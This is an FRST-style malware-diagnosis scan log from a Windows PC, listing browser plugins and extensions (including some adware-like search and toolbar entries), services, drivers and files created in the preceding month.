FF Plugin HKU\S-1-5-21-2815594105-2774959023-4293743994-1001: @hulu.com/Hulu Desktop -> C:\Users\Default.migrated\AppData\Local\HuluDesktop\instances\0.9.13.1\nphdplg.dll No File
FF Plugin HKU\S-1-5-21-2815594105-2774959023-4293743994-1001: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Ken Terry\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2012-11-12] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-2815594105-2774959023-4293743994-1001: @yahoo.com/BrowserPlus,version=2.9.8 -> C:\Users\Ken Terry\AppData\Local\Yahoo!\BrowserPlus\2.9.8\Plugins\npybrowserplus_2.9.8.dll [2010-08-04] (Yahoo! Inc.)
FF Plugin HKU\S-1-5-21-2815594105-2774959023-4293743994-1001: facebook.com/fbDesktopPlugin -> C:\Users\Ken Terry\AppData\Local\Facebook\Messenger\2.1.4814.0\npFbDesktopPlugin.dll [2013-03-07] (Facebook, Inc.)
FF Plugin HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @citrixonline.com/appdetectorplugin -> C:\Users\Ken Terry\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2014-05-22] (Citrix Online)
FF Plugin HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @hulu.com/Hulu Desktop -> C:\Users\Default.migrated\AppData\Local\HuluDesktop\instances\0.9.13.1\nphdplg.dll No File
FF Plugin HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Ken Terry\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2012-11-12] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @yahoo.com/BrowserPlus,version=2.9.8 -> C:\Users\Ken Terry\AppData\Local\Yahoo!\BrowserPlus\2.9.8\Plugins\npybrowserplus_2.9.8.dll [2010-08-04] (Yahoo! Inc.)
FF Plugin HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: facebook.com/fbDesktopPlugin -> C:\Users\Ken Terry\AppData\Local\Facebook\Messenger\2.1.4814.0\npFbDesktopPlugin.dll [2013-03-07] (Facebook, Inc.)
FF Extension: Unit Layers - C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\Extensions\[email protected] [2013-06-05]
FF Extension: Block site - C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\Extensions\{dd3d7613-0246-469d-bc65-2a3cc1668adc} [2015-09-06]
FF Extension: Selenium IDE: C# Formatters - C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\Extensions\[email protected] [2015-08-31]
FF Extension: Firebug - C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\Extensions\[email protected] [2012-10-12]
FF Extension: Selenium IDE: Java Formatters - C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\Extensions\[email protected] [2015-08-31]
FF Extension: Printing Helper - C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\Extensions\[email protected] [1670-07-29]
FF Extension: Selenium IDE: Python Formatters - C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\Extensions\[email protected] [2015-08-31]
FF Extension: Selenium IDE: Ruby Formatters - C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\Extensions\[email protected] [2015-08-31]
FF Extension: Selenium IDE - C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\Extensions\{a6fd85ed-e919-4a43-a5af-8da18bda539f}.xpi [2015-08-31]
FF Extension: Unit Layers - C:\Program Files (x86)\Mozilla Firefox\extensions\[email protected] [2015-08-31]
FF Extension: Selenium IDE: C# Formatters - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2015-08-31]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_22.5.0.124\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_22.5.0.124\coFFPlgn [2015-09-18]
FF HKLM-x32\...\Firefox\Extensions: [{3252b9ae-c69a-4eaf-9502-dc9c1f6c009e}] - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DMExtension
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: SmartPrintButton - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2013-03-06]

Chrome:
=======
CHR HomePage: Default -> hxxp://yahoo.com/
CHR StartupUrls: Default -> "hxxp://yahoo.com/","hxxps://www.google.com/"
CHR DefaultSearchURL: Default -> hxxp://dts.search.ask.com/web?q={searchTerms}
CHR DefaultSearchKeyword: Default -> Ask Search
CHR DefaultSuggestURL: Default -> hxxp://ssmsp.ask.com/query?sstype=prefix&li=ff&q={searchTerms}
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.93\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.93\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.93\pdf.dll => No File
CHR Plugin: (GoogleChromeRemotePlugin) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\amfclgbdpgndipgoegfpkkgobahigbcl\1.4_0\GoogleChromeRemotePlugin.dll => No File
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll => No File
CHR Plugin: (QuickTime Plug-in 7.7.4) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.4) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin2.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.4) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin3.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.4) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin4.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.4) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin5.dll (Apple Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (AdobeAAMDetect) - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll => No File
CHR Plugin: (Oberon com adapter) - C:\Program Files (x86)\Common Files\Oberon Media\NCAdapter\1.0.0.7\npapicomadapter.dll (Oberon-Media )
CHR Plugin: (Google Earth Plugin) - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.145\npGoogleUpdate3.dll => No File
CHR Plugin: (Java(TM) Platform SE 7 U15) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
CHR Plugin: (Silverlight Plug-In) - C:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll => No File
CHR Plugin: (MindSpark Toolbar Platform Plugin Stub) - C:\Program Files (x86)\TelevisionFanatic\bar\1.bin\NP64Stub.dll => No File
CHR Plugin: (WildTangent Games App V2 Presence Detector) - C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\3\NP_wtapp.dll => No File
CHR Plugin: (Windows Live0099 Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Plugin: (RocketLife Secure Plug-In Layer) - C:\ProgramData\Visan\plugins\npRLSecurePluginLayer.dll (RocketLife, LLP)
CHR Plugin: (Zylom Plugin) - C:\ProgramData\Zylom\ZylomGamesPlayer\npzylomgamesplayer.dll (Zylom)
CHR Plugin: (Unity Player) - C:\Users\Ken Terry\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
CHR Plugin: (Facebook Desktop) - C:\Users\Ken Terry\AppData\Local\Facebook\Messenger\2.1.4814.0\npFbDesktopPlugin.dll (Facebook, Inc.)
CHR Plugin: (BrowserPlus (from Yahoo!) v2.9.8) - C:\Users\Ken Terry\AppData\Local\Yahoo!\BrowserPlus\2.9.8\Plugins\npybrowserplus_2.9.8.dll (Yahoo! Inc.)
CHR Plugin: (Hulu Desktop) - C:\Windows\..\Users\Default\AppData\Local\HuluDesktop\instances\0.9.13.1\npHDPlg.dll (Hulu LLC)
CHR Plugin: (Shockwave Flash) - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_7_700_202.dll => No File
CHR Plugin: (Java Deployment Toolkit 7.0.150.3) - C:\Windows\SysWOW64\npDeployJava1.dll => No File
CHR Profile: C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Entanglement Web App) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\aciahcmjmecflokailenpkdchphgkefd [2013-10-28]
CHR Extension: (Norton Security Toolbar) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe [2015-07-15]
CHR Extension: (Norton Identity Safe) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif [2014-08-26]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-10]
CHR Extension: (Skype Click to Call) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2014-01-11]
CHR Extension: (AudioToAudio) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\lkbekmickkafhbgkehknddbfmhddckem [2015-01-07]
CHR Extension: (Poppit!) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcbkbpnkkkipelfledbfocopglifcfmi [2015-09-18]
CHR Extension: (Ask Search) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\mppnoffgpafgpgbaigljliadgbnhljfl [2015-09-18]
CHR Extension: (iLivid) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\nafaimnnclfjfedmmabolbppcngeolgf [2015-09-18]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-10-04]
CHR Extension: (20-20 3D Viewer for IKEA) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\pfhldcakmgpmglboaclpfdedehjblalp [2014-04-13]
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\Exts\Chrome.crx [2015-07-23]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\Exts\Chrome.crx [2015-07-23]
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-05-01]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77128 2015-05-29] (Apple Inc.)
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1394816 2015-05-01] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1772672 2015-05-01] (Microsoft Corporation)
S2 CLKMSVC10_C6F09094; C:\Program Files (x86)\Hewlett-Packard\Media\DVD\Kernel\HDDVD\NavFilter\kmsvc.exe [245232 2010-06-29] (CyberLink)
R2 ESRV_SVC_WILLAMETTE; C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\esrv_svc.exe [413848 2015-07-16] ()
S3 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [227904 2014-04-24] (WildTangent)
R2 LightScribeService; c:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2010-05-19] (Hewlett-Packard Company) [File not signed]
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2015-06-18] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.130\McCHSvc.exe [288776 2013-09-06] (McAfee, Inc.)
R2 MSMQ; C:\Windows\system32\mqsvc.exe [26112 2015-08-11] (Microsoft Corporation)
S2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [File not signed]
R2 NIS; C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\NIS.exe [282016 2015-07-16] (Symantec Corporation)
R2 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2804568 2010-06-01] (Symantec Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2004488 2015-07-15] (Electronic Arts)
R2 pdfcDispatcher; C:\Program Files (x86)\PDF Complete\pdfsvc.exe [635416 2009-10-14] (PDF Complete Inc)
S2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-08-06] (Hewlett-Packard) [File not signed]
R2 RalinkRegistryWriter; C:\Program Files (x86)\Ralink\Common\RaRegistry.exe [372736 2012-01-12] (Ralink Technology, Corp.) [File not signed]
R2 RalinkRegistryWriter64; C:\Program Files (x86)\Ralink\Common\RaRegistry64.exe [447488 2012-01-12] (Ralink Technology, Corp.) [File not signed]
S2 RaMediaServer; C:\Program Files (x86)\Ralink\Common\RaMediaServer.exe [625728 2011-08-18] ()
R2 rscp; C:\Program Files\Reason\Security\Protection\rscp\bin\rscp_svc.exe [163576 2015-09-12] ()
R2 rsEngineSvc; C:\Program Files\Reason\Security\rsEngineSvc.exe [80144 2015-08-12] (Reason Software Company Inc.)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [303360 2015-06-24] (Realtek Semiconductor)
R2 sprtsvc_ncnetworksdm; C:\Program Files (x86)\NCNETWORKSDM\bin\sprtsvc.exe [206120 2010-06-17] (SupportSoft, Inc.)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 SystemUsageReportSvc_WILLAMETTE; C:\Program Files (x86)\Intel Driver Update Utility\SUR\SurSvc.exe [105112 2015-07-16] ()
R2 tgsrvc_ncnetworksdm; C:\Program Files (x86)\NCNETWORKSDM\bin\tgsrvc.exe [185640 2010-06-17] (SupportSoft, Inc.)
S3 USER_ESRV_SVC_WILLAMETTE; C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\esrv_svc.exe [413848 2015-07-16] ()
S3 w3logsvc; C:\Windows\system32\inetsrv\w3logsvc.dll [84480 2015-08-11] (Microsoft Corporation)
R2 W3SVC; C:\Windows\system32\inetsrv\iisw3adm.dll [578560 2015-08-11] (Microsoft Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)
R2 YNanoService; C:\Program Files (x86)\Yahoo!\YNanoClient\cpn0\YNanoService.exe [157016 2012-05-23] (Yahoo! Inc.)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWT6.sys [102912 2015-05-28] (Advanced Micro Devices)
R1 BHDrvx64; C:\Program Files (x86)\Norton Internet Security\NortonData\22.5.0.124\Definitions\BASHDefs\20150904.001\BHDrvx64.sys [1650936 2015-07-23] (Symantec Corporation)
R1 ccSet_NIS; C:\Windows\system32\drivers\NISx64\1605020.00F\ccSetx64.sys [173808 2015-07-10] (Symantec Corporation)
S3 CpqDfw; C:\Windows\System32\drivers\CpqDfw.sys [27456 2012-05-29] (Windows (R) Codename Longhorn DDK provider)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [498512 2015-07-27] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [153936 2015-07-27] (Symantec Corporation)
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [32512 2014-03-12] ()
R1 IDSVia64; C:\Program Files (x86)\Norton Internet Security\NortonData\22.5.0.124\Definitions\IPSDefs\20150917.002\IDSvia64.sys [767224 2015-08-28] (Symantec Corporation)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [113880 2015-09-18] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-06-18] (Malwarebytes Corporation)
R3 MQAC; C:\Windows\System32\drivers\mqac.sys [175104 2015-08-11] (Microsoft Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton Internet Security\NortonData\22.5.0.124\Definitions\VirusDefs\20150918.001\ENG64.SYS [138488 2015-05-20] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton Internet Security\NortonData\22.5.0.124\Definitions\VirusDefs\20150918.001\EX64.SYS [2146040 2015-05-20] (Symantec Corporation)
R3 netr28x; C:\Windows\system32\DRIVERS\netr28x.sys [2554528 2015-06-12] (MediaTek Inc.)
S3 PAEAFLT.sys; C:\Windows\System32\drivers\PAEAFLT.sys [9472 2007-09-26] (PixArt Imaging Incorporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-07-10] (Realtek )
R3 semav6msr64; C:\WINDOWS\system32\drivers\semav6msr64.sys [21984 2015-06-04] ()
R1 SRTSP; C:\Windows\System32\Drivers\NISx64\1605020.00F\SRTSP64.SYS [926448 2015-07-10] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\NISx64\1605020.00F\SRTSPX64.SYS [50936 2015-07-10] (Symantec Corporation)
R0 SymEFASI; C:\Windows\System32\drivers\NISx64\1605020.00F\SYMEFASI64.SYS [1620720 2015-07-10] (Symantec Corporation)
S0 SymELAM; C:\Windows\System32\drivers\NISx64\1605020.00F\SymELAM.sys [24192 2015-07-10] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [111344 2015-07-23] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\NISx64\1605020.00F\Ironx64.SYS [297720 2015-07-10] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\NISx64\1605020.00F\SYMNETS.SYS [576248 2015-07-10] (Symantec Corporation)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
U3 idsvc; no ImagePath
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-09-19 07:44 - 2015-09-19 07:44 - 00016148 _____ C:\WINDOWS\system32\KENTERRY-HP_Ken Terry_HistoryPrediction.bin
2015-09-18 17:01 - 2015-09-18 17:01 - 00014050 _____ C:\Users\Ken Terry\Downloads\ESET results.txt
2015-09-18 12:56 - 2015-09-18 12:56 - 02870984 _____ (ESET) C:\Users\Ken Terry\Downloads\esetsmartinstaller_enu.exe
2015-09-18 12:46 - 2015-09-18 12:46 - 00049551 _____ C:\Users\Ken Terry\Desktop\MBAM results file.txt
2015-09-18 11:56 - 2015-09-18 17:11 - 00113880 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2015-09-18 11:56 - 2015-09-18 11:56 - 00001177 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-09-18 11:56 - 2015-09-18 11:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-09-18 11:56 - 2015-09-18 11:56 - 00000000 ____D C:\ProgramData\Malwarebytes
2015-09-18 11:56 - 2015-09-18 11:56 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-09-18 11:56 - 2015-06-18 08:42 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2015-09-18 11:56 - 2015-06-18 08:41 - 00109272 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2015-09-18 11:56 - 2015-06-18 08:41 - 00025816 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbam.sys
2015-09-18 11:54 - 2015-09-18 11:55 - 24345872 _____ (Malwarebytes Corporation ) C:\Users\Ken Terry\Downloads\mbam-setup-2.1.8.1057.exe
2015-09-18 11:39 - 2015-09-18 11:41 - 00000000 ____D C:\AdwCleaner
2015-09-18 11:39 - 2015-09-18 11:39 - 01662976 _____ C:\Users\Ken Terry\Downloads\AdwCleaner.exe
2015-09-17 14:15 - 2015-09-17 14:27 - 00072537 _____ C:\Users\Ken Terry\Downloads\Addition.txt
2015-09-17 14:13 - 2015-09-19 07:46 - 00049011 _____ C:\Users\Ken Terry\Downloads\FRST.txt
2015-09-17 14:13 - 2015-09-19 07:46 - 00000000 ____D C:\FRST
2015-09-17 14:12 - 2015-09-17 14:12 - 02191360 _____ (Farbar) C:\Users\Ken Terry\Downloads\FRST64.exe
2015-09-13 10:57 - 2015-09-13 10:57 - 00001234 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2015-09-13 10:57 - 2015-09-13 10:57 - 00001222 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2015-09-13 10:57 - 2015-09-13 10:57 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-09-13 10:54 - 2015-09-13 10:55 - 00242752 _____ C:\Users\Ken Terry\Downloads\Firefox Setup Stub 40.0.3.exe
2015-09-13 09:15 - 2015-09-13 09:15 - 00000040 _____ C:\WINDOWS\system32\擰ơ
2015-09-12 12:50 - 2015-09-12 12:50 - 00003638 _____ C:\WINDOWS\System32\Tasks\ReasonSecurityScheduledScan
2015-09-12 12:50 - 2015-09-12 12:50 - 00003500 _____ C:\WINDOWS\System32\Tasks\ReasonSecurityStart
2015-09-12 12:50 - 2015-09-12 12:50 - 00000000 ____D C:\ProgramData\Reason
2015-09-12 12:49 - 2015-09-12 12:49 - 00000958 _____ C:\Users\Public\Desktop\Reason Core Security.lnk
2015-09-12 12:49 - 2015-09-12 12:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reason Core Security
2015-09-12 12:49 - 2015-09-12 12:49 - 00000000 ____D C:\Program Files\Reason
2015-09-12 12:48 - 2015-09-12 12:49 - 04257344 _____ (Reason Software Company Inc.) C:\Users\Ken Terry\Downloads\reason-core-security-setup.exe
2015-09-06 07:23 - 2015-09-06 07:32 - 00000000 ____D C:\ProgramData\BSD
2015-09-06 07:20 - 2015-09-06 07:20 - 00213136 _____ (TweakBit) C:\Users\Ken Terry\Downloads\speedtest-optimizer-setup.exe
2015-09-04 04:45 - 2015-09-04 04:45 - 00000000 ____D C:\Users\Ken Terry\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2015-08-31 19:26 - 2015-09-18 11:36 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-08-31 13:08 - 2015-08-31 13:08 - 00011602 _____ C:\Users\Ken Terry\Downloads\USAO Pilot Car Sales Report.xlsx
2015-08-31 13:08 - 2015-08-31 13:08 - 00011602 _____ C:\Users\Ken Terry\Downloads\USAO Pilot Car Sales Report (1).xlsx
2015-08-31 13:07 - 2015-08-31 13:07 - 00012815 _____ C:\Users\Ken Terry\Downloads\USAO Daily Test Report.xlsx
2015-08-31 13:06 - 2015-08-31 13:06 - 00011264 _____ C:\Users\Ken Terry\Downloads\USAO Daily Revenue Report.xlsx
2015-08-29 05:53 - 2015-08-18 23:50 - 00609592 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2015-08-26 07:40 - 2015-08-26 07:42 - 00000000 ____D C:\Users\Ken Terry\AppData\Local\Comms
2015-08-24 10:19 - 2015-08-24 10:19 - 00632659 _____ C:\Users\Ken Terry\Downloads\download.htma;ways need my daughter.htm
2015-08-21 15:33 - 2015-08-21 15:56 - 00018803 _____ C:\Users\Ken Terry\Downloads\Customer Information.xlsx
2015-08-21 14:28 - 2015-08-21 14:28 - 00000000 ____D C:\ProgramData\ATI
2015-08-21 13:11 - 2015-08-21 13:11 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2015-08-21 07:40 - 2015-08-21 07:40 - 00061917 _____ C:\WINDOWS\SysWOW64\CCCInstall_201508210740093358.log
2015-08-21 07:40 - 2015-08-21 07:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Catalyst Control Center
2015-08-21 07:39 - 2015-08-21 07:39 - 00000000 ____D C:\Program Files\ATI Technologies
2015-08-21 07:38 - 2015-08-21 07:38 - 00066655 _____ C:\WINDOWS\SysWOW64\CCCInstall_201508210738068661.log
2015-08-21 07:37 - 2015-08-21 07:37 - 00000000 ____D C:\Users\Default\AppData\Roaming\ATI
2015-08-21 07:37 - 2015-08-21 07:37 - 00000000 ____D C:\Users\Default\AppData\Local\ATI
2015-08-21 07:37 - 2015-08-21 07:37 - 00000000 ____D C:\Users\Default User\AppData\Roaming\ATI
2015-08-21 07:37 - 2015-08-21 07:37 - 00000000 ____D C:\Users\Default User\AppData\Local\ATI
2015-08-21 07:35 - 2015-08-21 07:35 - 47795680 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\amdocl64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 30760944 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atio6axx.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 27544560 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\amdocl12cl64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 25308656 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atioglxx.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 15727072 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticaldd64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 14312416 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticaldd.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 09191312 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 07575664 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 06486000 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmantle64.dll
